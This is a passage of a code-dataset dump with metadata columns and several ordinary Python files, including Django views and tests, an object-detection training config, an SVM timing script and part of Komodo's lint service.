blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
01ed2276aaa8ccf051e68654900f77f99150ae15 | 4de03eecadc4c69caf792f4773571c2f6dbe9d68 | /tests/seahub/share/views/test_send_shared_link.py | c265c943065929d26d603cb4f387bfa7dd71b7aa | [
"Apache-2.0"
] | permissive | Tr-1234/seahub | c1663dfd12f7584f24c160bcf2a83afdbe63a9e2 | ed255e0566de054b5570218cb39cc320e99ffa44 | refs/heads/master | 2022-12-23T16:20:13.138757 | 2020-10-01T04:13:42 | 2020-10-01T04:13:42 | 300,138,290 | 0 | 0 | Apache-2.0 | 2020-10-01T04:11:41 | 2020-10-01T04:11:40 | null | UTF-8 | Python | false | false | 3,204 | py | from mock import patch
from django.core import mail
from django.core.urlresolvers import reverse
from django.test import override_settings
from seahub.profile.models import Profile
from seahub.profile.utils import refresh_cache
from seahub.test_utils import BaseTestCase
class SendSharedLinkTest(BaseTestCase):
def setUp(self):
mail.outbox = []
@override_settings(DEFAULT_FROM_EMAIL='[email protected]')
@patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
def test_can_send(self):
self.login_as(self.user)
resp = self.client.post(reverse('send_shared_link'), {
'email': self.user.email,
'file_shared_link': 'http://xxx',
'file_shared_name': 'xxx',
'file_shared_type': 'd',
'extra_msg': ''
}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, resp.status_code)
self.assertEqual(len(mail.outbox), 1)
assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
assert mail.outbox[0].from_email == '[email protected]'
@patch('seahub.share.views.REPLACE_FROM_EMAIL', True)
@patch('seahub.share.views.ADD_REPLY_TO_HEADER', True)
@patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
@patch('seahub.utils.IS_EMAIL_CONFIGURED', True)
def test_can_send_from_replyto_rewrite(self):
self.login_as(self.user)
resp = self.client.post(reverse('send_shared_link'), {
'email': self.user.email,
'file_shared_link': 'http://xxx',
'file_shared_name': 'xxx',
'file_shared_type': 'd',
'extra_msg': ''
}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, resp.status_code)
self.assertEqual(len(mail.outbox), 1)
assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
assert mail.outbox[0].from_email == self.user.email
assert mail.outbox[0].extra_headers['Reply-to'] == self.user.email
@patch('seahub.share.views.REPLACE_FROM_EMAIL', True)
@patch('seahub.share.views.ADD_REPLY_TO_HEADER', True)
@patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
@patch('seahub.utils.IS_EMAIL_CONFIGURED', True)
def test_can_send_from_replyto_rewrite_contact_email(self):
self.login_as(self.user)
nickname = 'Testuser'
contact_email= '[email protected]'
p = Profile.objects.add_or_update(self.user.email, nickname=nickname)
p.contact_email = contact_email
p.save()
refresh_cache(self.user.email)
resp = self.client.post(reverse('send_shared_link'), {
'email': self.user.email,
'file_shared_link': 'http://xxx',
'file_shared_name': 'xxx',
'file_shared_type': 'd',
'extra_msg': ''
}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, resp.status_code)
self.assertEqual(len(mail.outbox), 1)
assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
assert mail.outbox[0].from_email == contact_email
assert mail.outbox[0].extra_headers['Reply-to'] == contact_email
| [
"[email protected]"
] | |
775b26f16fa53c27ec712bf92cfb31553c92f19d | e24511af0fdf299130fdf1e27b7eda1e35064e7c | /app/coupon/apps.py | bab96066b77b4592b0cf454c6ef51fa085d53a67 | [] | no_license | amitbhalla/lms | 623dc6764dba5ee67a7f30d3882b7917b6441c2e | 0810a875008b371a7bd3996742ad3b04ce037b14 | refs/heads/main | 2023-07-19T12:12:40.570958 | 2021-09-17T16:55:29 | 2021-09-17T16:55:29 | 405,055,595 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 144 | py | from django.apps import AppConfig
class CouponConfig(AppConfig):
default_auto_field = "django.db.models.BigAutoField"
name = "coupon"
| [
"[email protected]"
] | |
84340a119e8fdb72320174077f9aa1c0605ca64f | 9d566e153a254390ed758f4e945781899b6dcd07 | /03_django/02_django_crud/articles/views.py | e9c78e872870c579df912051bc9513f1f01afb88 | [] | no_license | baambox5/TIL | 6f1b0fdc342ed29b85a68404b916fc6f4cace7bf | 0419779ccbf506a1e89d581b98658dd07b78388c | refs/heads/master | 2023-01-13T01:14:08.125234 | 2020-01-17T14:36:34 | 2020-01-17T14:36:34 | 195,918,108 | 0 | 0 | null | 2023-01-07T11:27:08 | 2019-07-09T02:31:02 | Jupyter Notebook | UTF-8 | Python | false | false | 2,964 | py | from IPython import embed
from django.core.exceptions import ValidationError
from django.shortcuts import render, redirect
from .models import Article, Comment
# Create your views here.
def index(request):
# articles = Article.objects.all()
articles = Article.objects.order_by('-pk') # DB가 변경(가능한 권장)
# articles = Article.objects.all()[::-1] # python이 변경
context = {'articles': articles,}
return render(request, 'articles/index.html', context)
def create(request):
# CREATE
if request.method == 'POST':
title = request.POST.get('title')
content = request.POST.get('content')
image = request.FILES.get('image')
# 1
# article = Article()
# article.title = title
# article.content = content
# article.save()
# 2
article = Article(title=title, content=content, image=image)
article.save()
# 3
# Article.objects.create(title=title, content=content)
return redirect(article) # 메인 페이지
# return redirect('/articles/', article.pk)
# NEW
else:
return render(request, 'articles/create.html')
def detail(request, article_pk):
article = Article.objects.get(pk=article_pk)
comments = article.comment_set.all()
context = {'article': article, 'comments': comments,}
return render(request, 'articles/detail.html', context)
def delete(request, article_pk):
article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
article.delete()
return redirect('articles:index')
else:
return redirect(article)
def update(request, article_pk):
article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
article.title = request.POST.get('title')
article.content = request.POST.get('content')
article.image = request.FILES.get('image')
article.save()
return redirect(article)
else:
context = {'article': article,}
return render(request, 'articles/update.html', context)
def comments_create(request, article_pk):
# 댓글을 달 게시글
article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
# form에서 넘어온 댓글 정보
content = request.POST.get('content')
# 댓글 생성 및 저장
comment = Comment(article=article, content=content)
comment.save()
return redirect(article)
# return redirect('articles:detail', article.pk)
# return redirect('articles:detail' article_pk)
else:
return redirect(article)
def comments_delete(request, article_pk, comment_pk):
# article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
comment = Comment.objects.get(pk=comment_pk)
comment.delete()
# return redirect(article)
return redirect('articles:detail', article_pk) | [
"[email protected]"
] | |
a3cf7cefbf7e8537e0c1fe7a704c4158e33f881b | 39e03684081b27311385a0ab31afcc2e09883e5c | /configs/reppoints/bbox_r50_grid_center_fpn_1x.py | f971b5b7b8c78a6abca727e7015b96d085b5f33b | [
"MIT",
"Python-2.0"
] | permissive | witnessai/MMSceneGraph | 8d0b2011a946ddcced95fbe15445b7f4da818509 | bc5e0f3385205404c712ae9f702a61a3191da0a1 | refs/heads/master | 2023-08-12T06:54:00.551237 | 2021-10-12T03:04:21 | 2021-10-12T03:04:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,462 | py | # model settings
norm_cfg = dict(type='GN', num_groups=32, requires_grad=True)
model = dict(
type='RepPointsDetector',
pretrained='torchvision://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
start_level=1,
add_extra_convs=True,
num_outs=5,
norm_cfg=norm_cfg),
bbox_head=dict(
type='RepPointsHead',
num_classes=81,
in_channels=256,
feat_channels=256,
point_feat_channels=256,
stacked_convs=3,
num_points=9,
gradient_mul=0.1,
point_strides=[8, 16, 32, 64, 128],
point_base_scale=4,
norm_cfg=norm_cfg,
loss_cls=dict(
type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_bbox_init=dict(type='SmoothL1Loss', beta=0.11, loss_weight=0.5),
loss_bbox_refine=dict(type='SmoothL1Loss', beta=0.11, loss_weight=1.0),
transform_method='minmax',
use_grid_points=True))
# training and testing settings
train_cfg = dict(
init=dict(
assigner=dict(type='PointAssigner', scale=4, pos_num=1),
allowed_border=-1,
pos_weight=-1,
debug=False),
refine=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.4,
min_pos_iou=0,
ignore_iof_thr=-1),
allowed_border=-1,
pos_weight=-1,
debug=False))
test_cfg = dict(
nms_pre=1000,
min_bbox_size=0,
score_thr=0.05,
nms=dict(type='nms', iou_thr=0.5),
max_per_img=100)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
evaluation = dict(interval=1, metric='bbox')
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/bbox_r50_grid_center_fpn_1x'
load_from = None
resume_from = None
workflow = [('train', 1)]
| [
"[email protected]"
] | |
848b91f09b40a31a3b9e5798f08cb9dc68841a53 | bd8b3d43a465b26f0d86a3007b41d6a3c22345a6 | /svsutils/iterators/__init__.py | 6bde41920adb8b8446e1ce7254e5cba9a485b1fe | [] | no_license | nathanin/svsutils | aed5d361ff4716390e093d6bab6bf3cc6dd69a9b | 5789c3e589ce9244b21a24d6cdc3909bc4e04517 | refs/heads/master | 2020-06-25T06:06:37.019860 | 2019-12-17T05:08:35 | 2019-12-17T05:08:35 | 199,225,548 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 122 | py | from .iterator_factory import PythonIterator, TensorflowIterator
__all__ = [
'PythonIterator',
'TensorflowIterator'
] | [
"[email protected]"
] | |
0187aa1b8fa9854b1f253d952bda031992f4b423 | 20a3cc1106fa86fc2d45cd1728cc87d5db97e1f7 | /old/pddbm/bug3.py | 7d0a81d444b74c37e2e621dc7a08f50608b54c18 | [] | no_license | sarahboufelja54/galatea | f5664f0b3117629b2c5bbe078a1bd52bb5e359e6 | 002a9f2905868be25b71770190fb2d5eda11c861 | refs/heads/master | 2020-12-04T13:45:07.697189 | 2018-12-12T16:27:09 | 2018-12-12T16:27:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,268 | py | import numpy as np
from sklearn.svm import SVC
import time
rng = np.random.RandomState([1,2,3])
m = 1000
n = 1000
X = rng.randn(m,n)
w = rng.randn(n)
b = rng.randn(1)
y = (np.dot(X,w) + b ) > 0
t1 = time.time()
svm = SVC(kernel = 'linear', C = 1.0).fit(X,y)
t2 = time.time()
print 'train time ',t2 - t1
t1 = time.time()
y1 = svm.predict(X)
t2 = time.time()
print 'predict time ',t2 - t1
print '# support vectors:',svm.n_support_
print 'predict time per support vector:',(t2-t1)/float(svm.n_support_.sum())
coef = svm.coef_[0,:]
orig_coef = svm.coef_
t1 = time.time()
f = - np.dot(X, orig_coef.T) + svm.intercept_
y2 = f < 0
print y.shape
print y2.shape
print (y2 == y).shape
quit(-1)
t2 = time.time()
print 'dot product time',t2 -t1
print 'class 1 prevalence ',y.mean()
print 'predict accuracy ',(y1 == y).mean()
print 'dot product accuracy ',(y2 == y).mean()
print 'predict and dot agreement rate',(y1 == y2).mean()
coefs = svm.dual_coef_
assert len(coefs.shape) == 2
assert coefs.shape[0] == 1
coefs = coefs[0,:]
w = np.dot(svm.support_vectors_.T, coefs)
assert np.allclose(w,-coef)
f = np.dot(X,w) + b
y3 = (f < 0)
print 'agreement rate with my method: ',(y3 == y1).mean()
print 'dot prod between sklearn coef_ and my coef_: ',np.dot(w,svm.coef_[0,:])
| [
"[email protected]"
] | |
244651275300889c2f7a9b4928af9c1940ad6614 | 4be9a5bdb8e051001b78c8f127ccc1a7f85c14e7 | /bugzilla/migrations/0002_auto_20170205_1515.py | 6b518a7b30a1bea8b1cda0d937046f6fe0febbe5 | [] | no_license | quentin-david/heimdall | f72a85606e7ab53683df2023ef5eaba762198211 | 84a429ee52e1891bc2ee4eb07a084dff209c789c | refs/heads/master | 2021-01-21T10:26:28.895663 | 2017-07-21T19:19:46 | 2017-07-21T19:19:46 | 83,432,596 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 638 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-02-05 15:15
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bugzilla', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='bugzilla',
options={'ordering': ['-date_update']},
),
migrations.AlterField(
model_name='bugzilla',
name='state',
field=models.CharField(choices=[('open', 'Open'), ('close', 'Close'), ('info', 'Info')], max_length=15),
),
]
| [
"[email protected]"
] | |
2eeceb42de2ea27fde10e7e6d5c08914488ee6c5 | b4da2201d2df789e28472aeded28720d5269ade5 | /Komodo-Edit-7/lib/mozilla/components/koLintService.py | 4e543d65bce81928a8d67a2192aeee69c031327d | [] | no_license | AeonSaber/first_app | 5ad89d4fb05d7662e2a39ce68176f43f1e618bf0 | 522fdfa6d33419fd49e431766fff85b40d21e78e | refs/heads/master | 2020-06-12T17:22:09.786142 | 2013-09-09T23:57:51 | 2013-09-09T23:57:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 30,788 | py | #!python
# ***** BEGIN LICENSE BLOCK *****
# Version: MPL 1.1/GPL 2.0/LGPL 2.1
#
# The contents of this file are subject to the Mozilla Public License
# Version 1.1 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
# http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS IS"
# basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the
# License for the specific language governing rights and limitations
# under the License.
#
# The Original Code is Komodo code.
#
# The Initial Developer of the Original Code is ActiveState Software Inc.
# Portions created by ActiveState Software Inc are Copyright (C) 2000-2007
# ActiveState Software Inc. All Rights Reserved.
#
# Contributor(s):
# ActiveState Software Inc
#
# Alternatively, the contents of this file may be used under the terms of
# either the GNU General Public License Version 2 or later (the "GPL"), or
# the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
# in which case the provisions of the GPL or the LGPL are applicable instead
# of those above. If you wish to allow use of your version of this file only
# under the terms of either the GPL or the LGPL, and not to allow others to
# use your version of this file under the terms of the MPL, indicate your
# decision by deleting the provisions above and replace them with the notice
# and other provisions required by the GPL or the LGPL. If you do not delete
# the provisions above, a recipient may use your version of this file under
# the terms of any one of the MPL, the GPL or the LGPL.
#
# ***** END LICENSE BLOCK *****
import os, sys
import threading
import time
import urllib2
from xpcom import components, nsError, ServerException, COMException
from xpcom._xpcom import PROXY_SYNC, PROXY_ALWAYS, PROXY_ASYNC, getProxyForObject
from xpcom.server import WrapObject, UnwrapObject
from koLintResult import KoLintResult, getProxiedEffectivePrefs
from koLintResults import koLintResults
import logging
log = logging.getLogger("koLintService")
#log.setLevel(logging.DEBUG)
class RequestQueue:
# This is a modification if Python's std Queue.Queue class:
# - drop maxsize related stuff
# - calls are always blocking
# - add .prepend() and .remove_uid()
def __init__(self):
import thread
self._init()
self.mutex = thread.allocate_lock()
self.esema = thread.allocate_lock() # if acquired, then queue is empty
self.esema.acquire()
def put(self, item):
"""Put an item into the queue."""
log.debug("in RequestQueue.put, acquiring mutex")
self.mutex.acquire()
log.debug("in RequestQueue.put, acquired mutex")
try:
was_empty = self._empty()
self._append(item)
# If we fail before here, the empty state has
# not changed, so we can skip the release of esema
if was_empty:
log.debug("in RequestQueue.put, releasing esema")
self.esema.release()
finally:
# Catching system level exceptions here (RecursionDepth,
# OutOfMemory, etc) - so do as little as possible in terms
# of Python calls.
log.debug("in RequestQueue.put, releasing mutex")
self.mutex.release()
def prepend(self, item):
"""Prepend an item to the queue."""
log.debug("in RequestQueue.prepend, acquiring mutex")
self.mutex.acquire()
log.debug("in RequestQueue.prepend, acquired mutex")
try:
was_empty = self._empty()
self._prepend(item)
# If we fail before here, the empty state has
# not changed, so we can skip the release of esema
if was_empty:
log.debug("in RequestQueue.prepend, releasing esema")
self.esema.release()
finally:
# Catching system level exceptions here (RecursionDepth,
# OutOfMemory, etc) - so do as little as possible in terms
# of Python calls.
log.debug("in RequestQueue.prepend, releasing mutex")
self.mutex.release()
def get(self):
"""Remove and return an item from the queue.
Block if necessary until an item is available.
"""
log.debug("in RequestQueue.get, acquiring esema")
self.esema.acquire()
log.debug("in RequestQueue.get, acquired esema")
log.debug("in RequestQueue.get, acquiring mutex")
self.mutex.acquire()
log.debug("in RequestQueue.get, acquired mutex")
release_esema = 1
try:
item = self._get()
# Failure means empty state also unchanged - release_esema
# remains true.
release_esema = not self._empty()
finally:
if release_esema:
log.debug("in RequestQueue.get, releasing esema")
self.esema.release()
log.debug("in RequestQueue.get, releasing mutex")
self.mutex.release()
return item
def remove_uid(self, uid):
"""Remove all current requests with the given uid.
Does not return anything.
"""
log.debug("in RequestQueue.remove_uid, acquiring esema")
if not self.esema.acquire(0): # do not block to acquire lock
# return if could not acquire: means queue is empty and
# therefore do not have any items to remove
log.debug("in RequestQueue.remove_uid, did not acquire esema")
return
log.debug("in RequestQueue.remove_uid, acquired mutex")
log.debug("in RequestQueue.remove_uid, acquiring mutex")
self.mutex.acquire()
release_esema = 1
try:
self._remove_uid(uid)
# Failure means empty state also unchanged - release_esema
# remains true.
release_esema = not self._empty()
finally:
if release_esema:
log.debug("in RequestQueue.remove_uid, releasing esema")
self.esema.release()
log.debug("in RequestQueue.remove_uid, releasing mutex")
self.mutex.release()
#---- Override these methods to implement other queue organizations
# (e.g. stack or priority queue). These will only be called with
# appropriate locks held.
# Initialize the queue representation
def _init(self):
self.queue = []
# Check whether the queue is empty
def _empty(self):
return not self.queue
# Put a new item in the queue
def _append(self, item):
self.queue.append(item)
def _prepend(self, item):
self.queue.insert(0, item)
# Get an item from the queue
def _get(self):
item = self.queue[0]
del self.queue[0]
return item
# Remove all requests with the given uid.
def _remove_uid(self, uid):
self.queue = [item for item in self.queue
if hasattr(item, "uid") and item.uid != uid]
class _GenericAggregator(object):
_com_interfaces_ = [components.interfaces.koILinter]
_reg_desc_ = "Komodo Generic Aggregate Linter"
_reg_clsid_ = "{b68f4ff8-f37e-45d1-970e-88b964e7096d}"
_reg_contractid_ = "@activestate.com/koGenericLinterAggregator;1"
def initialize(self, languageName, koLintService):
self._languageName = languageName
self._koLintService = koLintService
def lint(self, request):
text = request.content.encode(request.encoding.python_encoding_name)
return self.lint_with_text(request, text)
def lint_with_text(self, request, text):
linters = self._koLintService.getTerminalLintersForLanguage(self._languageName)
finalLintResults = koLintResults()
for linter in linters:
try:
newLintResults = UnwrapObject(linter).lint_with_text(request, text)
except:
log.exception("lint_with_text exception")
else:
if newLintResults and newLintResults.getNumResults():
if finalLintResults.getNumResults():
finalLintResults = finalLintResults.addResults(newLintResults)
else:
finalLintResults = newLintResults
return finalLintResults
class KoLintRequest:
_com_interfaces_ = [components.interfaces.koILintRequest]
_reg_desc_ = "Komodo Lint Request"
_reg_clsid_ = "{845A872F-293F-4a82-8552-40849A92EC80}"
_reg_contractid_ = "@activestate.com/koLintRequest;1"
def __init__(self):
self.rid = None
self._koDoc = None
self.uid = ''
self.linterType = ''
self.cwd = ''
self.content = None
self.encoding = None
self.linter = None
self.results = None
self.errorString = ''
@property
def document(self):
import warnings
warnings.warn("`koILintRequest.document` was DEPRECATED in Komodo "
"6.0.0b1, use `koILintRequest.koDoc`.",
DeprecationWarning)
return self.koDoc
@property
def koDoc(self):
return self._koDoc
def get_koDoc(self):
return self._koDoc
def set_koDoc(self, val):
# Access to the koDoc *must* be from the main thread, otherwise
# Komodo may crash!
self._koDoc = getProxyForObject(1,
components.interfaces.koIDocument, val,
PROXY_ALWAYS | PROXY_SYNC)
def describe(self):
return "<KoLintRequest: %s on uid %s>" % (self.linterType, self.uid)
class KoLintService:
_com_interfaces_ = [components.interfaces.koILintService,
components.interfaces.nsIObserver]
_reg_desc_ = "Komodo Lint Management Service"
_reg_clsid_ = "{9FD67601-CB60-411D-A212-ED21B3D25C15}"
_reg_contractid_ = "@activestate.com/koLintService;1"
def __init__(self):
log.info("KoLintService.__init__()")
self._linterCache = {} # mapping of linterCID to koILinter instance
self.requests = RequestQueue() # an item of None is the quit sentinel
self._shuttingDown = 0
self.manager = threading.Thread(target=self.run, name="Linter")
self.manager.setDaemon(True)
self.manager.start()
self._wrapped = WrapObject(self, components.interfaces.nsIObserver)
_observerSvc = components.classes["@mozilla.org/observer-service;1"].\
getService(components.interfaces.nsIObserverService)
_observerSvc.addObserver(self._wrapped, 'xpcom-shutdown', 1)
self._prefs = components.classes["@activestate.com/koPrefService;1"].\
getService(components.interfaces.koIPrefService).prefs
# dict of { 'terminals' => array of linters, 'aggregators' => array of linters }
self._linterCIDsByLanguageName = {}
# Init it now, pay the price of walking through the categories now...
catman = components.classes["@mozilla.org/categorymanager;1"].\
getService(components.interfaces.nsICategoryManager)
categoryName = 'category-komodo-linter-aggregator'
names = catman.enumerateCategory(categoryName)
while names.hasMoreElements():
nameObj = names.getNext()
rawName, fixedName = self._getCategoryNameFromNameObj(nameObj)
cid = catman.getCategoryEntry(categoryName, rawName)
if not self._linterCIDsByLanguageName.has_key(fixedName):
self._linterCIDsByLanguageName[fixedName] = {'terminals':[],
'aggregator':cid}
else:
log.warn("Possible Problem: more than one entry for linter aggregator %s (was %s), now %s",
name,
self._linterCIDsByLanguageName[fixedName]['aggregator'],
cid)
self._linterCIDsByLanguageName[fixedName]['aggregator'] = cid
categoryName = 'category-komodo-linter'
names = catman.enumerateCategory(categoryName)
while names.hasMoreElements():
nameObj = names.getNext()
rawName, fixedName = self._getCategoryNameFromNameObj(nameObj)
idx = fixedName.find("&type=")
if idx == -1:
languageName = fixedName
else:
languageName = fixedName[:idx]
cid = catman.getCategoryEntry(categoryName, rawName)
if not self._linterCIDsByLanguageName.has_key(languageName):
self._linterCIDsByLanguageName[languageName] = {'terminals':[],
'aggregator':None}
self._linterCIDsByLanguageName[languageName]['terminals'].append(cid)
#log.debug("Loaded these linters: %s", self._linterCIDsByLanguageName)
def _getCategoryNameFromNameObj(self, nameObj):
nameObj.QueryInterface(components.interfaces.nsISupportsCString)
rawName = nameObj.data
try:
fixedName = urllib2.unquote(rawName)
except:
fixedName = rawName
return rawName, fixedName
def getLinter_CID_ForLanguage(self, languageName):
return self._getLinterCIDByLanguageName(languageName)
def observe(self, subject, topic, data):
#print "file status service observed %r %s %s" % (subject, topic, data)
if topic == 'xpcom-shutdown':
log.debug("file status got xpcom-shutdown, unloading");
self.terminate()
def terminate(self):
log.info("KoLintService.terminate()")
self.requests.prepend(None) # prepend the quit sentinel
self._shuttingDown = 1
# Do NOT attempt to .join() the manager thread because it is nigh on
# impossible to avoid all possible deadlocks.
def getTerminalLintersForLanguage(self, languageName):
return [self._getLinterByCID(cid)
for cid in self._linterCIDsByLanguageName[languageName]['terminals']]
GENERIC_LINTER_AGGREGATOR_CID = "@activestate.com/koGenericLinterAggregator;1"
def _getLinterCIDByLanguageName(self, languageName):
try:
linters = self._linterCIDsByLanguageName[languageName]
except KeyError:
self._linterCIDsByLanguageName[languageName] = {'aggregator':None,
'terminals':[],
'generated':True}
return None
# If there's no explicit aggregator, return the first terminal linter.
# If there isn't one, throw the ItemError all the way to top-level
if linters['aggregator'] is not None:
return linters['aggregator']
if len(linters['terminals']) != 1:
if len(linters['terminals']) == 0:
if not linters.get('generated', False):
log.error("No terminal linters for lang %s", languageName)
return None
# Create a generic aggregator for this language.
linters['aggregator'] = (self.GENERIC_LINTER_AGGREGATOR_CID
+ ":" + languageName)
return linters['aggregator']
return linters['terminals'][0]
def getLinterForLanguage(self, languageName):
"""Return a koILinter XPCOM component of the given linterCID.
This method cache's linter instances. If there is no such linter
then an exception is raised.
Note that aggregators are favored over terminal linters.
"""
linterCID = self._getLinterCIDByLanguageName(languageName)
if linterCID is None:
return None
return self._getLinterByCID(linterCID)
def _getLinterByCID(self, linterCID):
if linterCID not in self._linterCache:
try:
if linterCID.startswith(self.GENERIC_LINTER_AGGREGATOR_CID):
languageName = linterCID[len(self.GENERIC_LINTER_AGGREGATOR_CID) + 1:]
linter = components.classes[self.GENERIC_LINTER_AGGREGATOR_CID].createInstance(components.interfaces.koILinter)
UnwrapObject(linter).initialize(languageName, self)
elif linterCID not in components.classes.keys():
linter = None
else:
linter = components.classes[linterCID].createInstance(components.interfaces.koILinter)
except COMException, ex:
errmsg = "Internal Error creating a linter with CID '%s': %s"\
% (linterCID, ex)
raise ServerException(nsError.NS_ERROR_UNEXPECTED, errmsg)
self._linterCache[linterCID] = linter
return self._linterCache[linterCID]
def addRequest(self, request):
"""Add the given request to the queue.
If there is an error (e.g. bogus linterType) an exception is raised.
"""
log.info("KoLintService.addRequest(%s)", request.describe())
# Fill out the request (because document access and component
# creation must often be done in the main thread).
request.content = request.koDoc.buffer
request.encoding = request.koDoc.encoding
if request.linterType:
request.linter = self.getLinterForLanguage(request.linterType)
self.requests.put(request)
def cancelPendingRequests(self, uid):
log.info("KoLintService.cancelPendingRequests(uid='%s')", uid)
self.requests.remove_uid(uid)
# This does nothing to stop the reporting of results from a
# possible _currently running_ lint request for this uid.
# This is currently handled on the JavaScript side via the
# koILintRequest.rid attribute.
def _getEncodingLintResults(self, content, encoding):
"""Return lint results for encoding errors in the given document.
"content" is the document content as a unicode string
"encoding" is the currently selected encoding for the document
Returns a koLintResults instance.
"""
try:
encodedString = content.encode(encoding.python_encoding_name,
"strict")
except UnicodeError, ex:
pass # errors are handled after the try/except/else block
else:
return koLintResults() # no encoding errors
# Find the specific errors by encoding with "replace" and finding
# where those replacements were.
escapedContent = content.replace('?', 'X')
encodedString = escapedContent.encode(encoding.python_encoding_name,
"replace")
offset = 0
indeces = []
while 1:
index = encodedString.find('?', offset)
if index == -1:
break
indeces.append(index)
offset = index + 1
log.debug("encoding errors at indeces %s", indeces)
results = koLintResults()
lines = content.splitlines(1) # keep line terminators
offset = 0 # the current offset in the document
for i in range(len(lines)):
line = lines[i]
while indeces and indeces[0] < offset + len(line):
index = indeces.pop(0) # this index is on this line
r = KoLintResult()
r.description = "This character cannot be represented with "\
"the current encoding: '%s'"\
% encoding.python_encoding_name
r.lineStart = i+1
r.lineEnd = i+1
r.columnStart = index - offset + 1
r.columnEnd = r.columnStart + 1
log.debug("encoding error: index=%d: %d,%d-%d,%d", index,
r.lineStart, r.columnStart, r.lineEnd, r.columnEnd)
r.severity = r.SEV_ERROR
results.addResult(r)
if not indeces:
break
offset += len(line)
else:
raise ValueError("Did not find line and column for one or "
"more indeces in content: %s" % indeces)
return results
def _addMixedEOLWarnings(self, results, content, expectedEOL):
"""Add lint results (at the WARNING level) for each line that has
